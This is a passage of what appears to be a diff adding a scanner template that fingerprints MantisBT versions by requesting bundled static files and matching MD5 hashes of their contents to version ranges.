"{{BaseURL}}/core/adodb/xsl/convert-0.1-0.2.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"29d98453a420d4cbaee77cf29e79ccea\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"a27afd139988168b3b90e18e31da5392\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/convert-0.2-0.1.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"5d2788a525f2591249dedab11fa603b4\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"31f9619a3cbc5929267b62c780eb299a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/convert-0.2-0.3.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"409846921dd94e5bbb473ff65314ea2a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/cute_icons_for_site/adodb2.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"f5405fa66aa4da4f6507c9356581b539\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"9b3fdc5a83cc801151db6f2905fbf383\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/cute_icons_for_site/adodb.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"943052b5ea2b4188ca4453f9b62cebae\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"9f43e16d833127874dc1d63fc2963e02\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/pear/readme.Auth.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"497018d573a00f8e9c6881907cac4a63\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b15ce23506dc56301530bd933bf96308\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/session_schema2.xml" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"34094c892ec3ab48bdaead67fd0d09be\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/session_schema.xml" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - 
"(\"644334444418c6b39d20b6f22f3cf634\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/adodb-sessions.oracle.sql" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"08d0fc1f5fbf8b79a4dca43cbd30e3a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/adodb-sessions.oracle.clob.sql" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"3c64f822ee1b493b319c6e8196cc06b8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/adodb-sessions.mysql.sql" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"42fef0886af1f6da31a06de273876b71\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/adodb-sess.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"260bf23fe50279cf27842c0ac8b12ed4\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"a25a7a7ed70830c2d14901e8bf14d4de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-active-record.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"4045af219774766581be4608a56c54e9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-perf.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"5efa63773a850269f541a84767d0e355\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"26402e0816ffb9f0ca6aba591b7825d3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/readme.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"9a0e51379d70a597d2be5cf38ee0dbed\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"deba1b5723be270613c2b4980cf55a69\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/tute.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"691e557cea6f1f8d7d07329459120954\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - 
"(\"f6f3e9cfb0406893ad4e5832c6307d0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-adodb.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"fdc5ef2bbb259e471483fc8ffee3ab91\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"da44a312bf44d8832cbe53e6092d1ac6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-session.old.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"de59e3c34a302c8e7eb2c14ad68e9a1a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-session.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"0033c4fdd9c291cbc68151c2efe3689b\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"453530e8910db67e48edfb6f80f03bcf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/tips_portable_sql.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"1ad08763e233d4e59ac29db460dad7af\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"743c9b86d9dbd97c51834da5083e72b2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-datadict.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"d9b3890f5bf06f5f5b594dbf74e1ad95\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"5365b830c7ac2fb5e23fac9449323c91\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/old-changelog.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"3158a33f9d5eda38a369b5749198dd02\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b3952f2585266f48eaaa75cbe84083bb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-oracle.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"2c7d7f70eb2c1fbf17154b79e8f72ae0\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"3eb91eddfea6fc4b901d7c6959445f79\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/readme.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"856de932c83745af0a66cd21d6d1abbf\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b3809df536fca57760f3fc91370b9e65\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xmlschema03.dtd" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"1cd47a61a1edb4da944b23a6fe59bd2a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/license.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"8bd77614212dddcfe8ef04c95fbd92e6\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"d859613d59de1a1b9d0846df6a8fa195\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xmlschema.dtd" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"26f3f629d55257aafcf66840d7c66618\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"892d5f9859568839158ee76d9a5a8768\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/disposable/changelog.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"368f101e8dd3ea316544c450bb050475\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/disposable/readme.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"120dd032874f0fbc828d92e024cf3dbc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/disposable/license.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"278f2557e3b277b94e9a8430f6a6d0a9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/phpmailer/ChangeLog.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"eb64471fb08256563d7d82d8939e4863\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"9138b510f445295a029ee5dd71cc4732\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/phpmailer/README" + + matchers: + - type: dsl + 
name: 1.1.0 - 1.1.9 + dsl: + - "(\"20d2b8e182743c998759bcd9b0306207\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"4aefed554e3533d989b8b2df590422a5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/phpmailer/LICENSE" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"278f2557e3b277b94e9a8430f6a6d0a9\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"093f6700134dc001638bfd9f6d077d52\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/ezc/forum_evolution.svg" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"aebedc90b271f6f14134b3005a8e3e7b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/changelog.txt" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.15 + dsl: + - "(\"c05b00d198cf3b6794d625efd080d684\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/images/erd.png" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"50d3c819a942757ba637e949fb933511\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/erd/README" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"41f298d6100359d4facd6c024fda5715\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/Makefile" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"38d8da784577e2bd5050bdca4ab4eea1\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.15 + dsl: + - "(\"1ef4671f58e0f5e8e618543af45b2cf4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/authentication.sgml" + + matchers: + - type: dsl + name: 1.2.11 - 1.2.20 + dsl: + - "(\"50141a26d26acfd92e5dd99cd77d8047\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/administration_guide.sgml" + + matchers: + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a14339a6eb6000d12138564a20bd3e81\" == md5(body))" + - type: dsl + name: 1.2.13 - 
1.2.16 + dsl: + - "(\"0f1b75dff25585b86aec2f96a448d2d2\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"34ff15d18ba6a63df1ae4e4e00b14ae1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/file-entities.ent" + + matchers: + - type: dsl + name: 1.2.11 - 1.2.20 + dsl: + - "(\"ad89c63c010b28acecdd2b37bc5fd721\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/contributing.sgml" + + matchers: + - type: dsl + name: 1.2.11 - 1.2.20 + dsl: + - "(\"7eca1a0d02dd400081050a7f1397255e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/no_avatar.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"bab5ffd2a8e4e94147ead338f7550364\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"4626235254b758695108c4a9d9e1015a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_logo_button.gif" + + matchers: + - type: dsl + name: 1.0.7 - 1.2.8 + dsl: + - "(\"5effa565b42e22b8b46f7dc205f92ffb\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.6 + dsl: + - "(\"068896aec621675c1be1607b0dd4e47f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/langreadme.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"ec2f21d68c7f46165de03ce7582e89ad\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"3231d0251d719843fc81f8557994347f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/packages/mantis.spec" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"39a60df7e51d93401c13345e81753f4d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"e8e328b3f27c064c9a4fe0afb1fca7a4\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"5e660eabbc6ff601ab7eee39038c6c0f\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"a3fca230523b842eed429cbff3e320da\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/packages/mantis-httpd.conf" + + matchers: + - type: dsl + name: 1.1.0 - 1.2.20 + dsl: + - "(\"764fb8143b71bb46ca7199bfa9a8ec77\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/projax/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/projax/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"af48433b572542f84cdf78ee02fa5283\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/remove-0.3.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"c793418c11c7eee38fb23dd853959015\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/convert-0.1-0.3.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"fa97c0a510cbd8161e586efeb4b8412f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/remove-0.2.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"675fd3ff12cb65b88155016a59e0ca8d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/convert-0.1-0.2.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"63ec818e375adb621902cc083e7cbd10\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/convert-0.2-0.1.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"f5cdb1f409414a3b72e532a42a78f4b4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/convert-0.2-0.3.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"88a905c5043232fe556bd560bf11469a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/session_schema2.xml" + + matchers: 
+ - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"34094c892ec3ab48bdaead67fd0d09be\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/session_schema.xml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"644334444418c6b39d20b6f22f3cf634\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/adodb-sessions.oracle.sql" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"08d0fc1f5fbf8b79a4dca43cbd30e3a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/adodb-sessions.oracle.clob.sql" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"3c64f822ee1b493b319c6e8196cc06b8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/adodb-sessions.mysql.sql" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"42fef0886af1f6da31a06de273876b71\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/adodb-sess.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"a25a7a7ed70830c2d14901e8bf14d4de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/readme.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"71c3c2e2788d94f85e79cee58c3822a3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xmlschema03.dtd" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"159863e1185c2a4456c83667b07c9b6a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/license.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"803565e2ea14ad5e31d297b4fe733c2e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"a62482595426e906c9c033099868b3ef\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xmlschema.dtd" + + matchers: + - type: dsl + name: 1.2.0 - 
1.2.15 + dsl: + - "(\"81b52dc1ee9c8403876f65ec6aabd948\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/changelog.txt" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"80fc00e3de887712c3105246837763ad\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"37ea1048a83a292babfcec13ee4dca31\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/readme.txt" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"120dd032874f0fbc828d92e024cf3dbc\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"d5cf0e33f4d5b8bbe13b98ad50da2056\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/license.txt" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"278f2557e3b277b94e9a8430f6a6d0a9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"f977bb0142a421d5840bc8ee6e4dd77a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"26c06df55b91add33a83dd4be5a51d2f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/ChangeLog.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.11 + dsl: + - "(\"1cb3112bc96f0b4cd8ab0ba4ae1565d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/README" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.11 + dsl: + - "(\"7f027da7d3d8554b19aeaf468e48f90d\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.15 + dsl: + - "(\"5a77656de86a8d65fe03fad7f851534f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == 
md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/LICENSE" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"278f2557e3b277b94e9a8430f6a6d0a9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.11 + dsl: + - "(\"df6a490d9e9290c129febdaada8b6c65\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.15 + dsl: + - "(\"15a85dde8ab9b2e525ba29e96f21fb0f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/nusoap/0001-Fix-12312-NuSOAP-web-description-XSS-vulnerability.patch" + + matchers: + - type: dsl + name: 1.2.3 - 1.2.20 + dsl: + - "(\"d639190a9af09a00523157562b0ac27b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/nusoap/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/nusoap/changelog" + + matchers: + - type: dsl + name: 1.2.2 - 1.2.20 + dsl: + - "(\"d75ed67ec93c02e5bce94eee8205b425\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b88a16e2fbde2985a608842d9b638eb0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/nusoap/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"9b29d9bab3199318458871514e2c44f9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/addLoadEvent.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"4392c8211101ebffd5ad4ad4d4ffa5c4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/builder.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"0e00864d2f38e4948900b93269315024\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/prototype.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d86c96a98574f29e180949cbb3e9a9f3\" == md5(body))" + + - method: GET + 
path: + - "{{BaseURL}}/javascript/min/projax/effects.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"bfd0061e7de5bc897084f16a8d095638\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/prototype_b.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"64931f33876162521ada7466973575db\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/scriptaculous.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"bad1b0520d6d2af809f53eb5f1b7c940\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/license.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"833423bd99b3d322db8e86d779eaa21d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/slider.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"fab1c870d2fa8bbc26bbd9b1d6c1c4bf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/dragdrop.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"be37f580c38a198c93ccb23d2d0e92ce\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/MIT-LICENSE" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"644476df73032b063a33b199a3003fd8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/controls.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"64e2316bd5bd77882335214e26cc474e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/jscalendar/lang/calendar-en.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"6b2f02f1cb05b5a53aafdd28a32346e9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/jscalendar/calendar.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d64850e4f303b6acf96f122e21aea59c\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/javascript/min/jscalendar/calendar-blue.css" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"4c50139975d4ceb05733c94facd25563\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/jscalendar/calendar-setup.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"6c8b2fda6bc7b451899c73a4a5c898c4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/time_tracking_stopwatch.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"c9d14d0f20929e690fe083a856f3e7ed\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/ajax.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"39134f65ab3f98920917f026765fb8f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/common.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"8c567a7959d10844b935f80e480842c3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/xmlhttprequest.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"5332526d23955b3e3dff840711f3d494\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/dynamic_filters.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"788a119f04305728953ea6685c8bc90b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/addLoadEvent.js" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"c4ac12c0570ab4d9ff2f1865e5cc9358\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"6ebfcc65439139d09bbc818c0435e840\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.4 + dsl: + - "(\"7d03fac871de1942c0b0beb7fb9f5489\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"e9ced3caf3bd6526aee6ba18660cd59b\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"d269c970093fb15cea9ce70f6b2153eb\" == md5(body))" + + - method: GET + path: + - 
"{{BaseURL}}/javascript/dev/projax/builder.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"fab777049e97ff23d992c0f9df6fe7af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/prototype.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"0b6e13d98a62152483f771c3f4ef337e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/effects.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"7b54098c8b5e58849b613fbc93fdd80a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/prototype_b.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"561bacbdd049a9137c854b02a881923d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/scriptaculous.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"05af88c2c6963028de769f281b16d729\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/license.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"833423bd99b3d322db8e86d779eaa21d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/slider.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"0832e1ff1697bda772909815b6ee1ab5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/dragdrop.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"c5581bf86657295a26d0a2a6f23a752b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dev/projax/MIT-LICENSE" + + matchers: + - 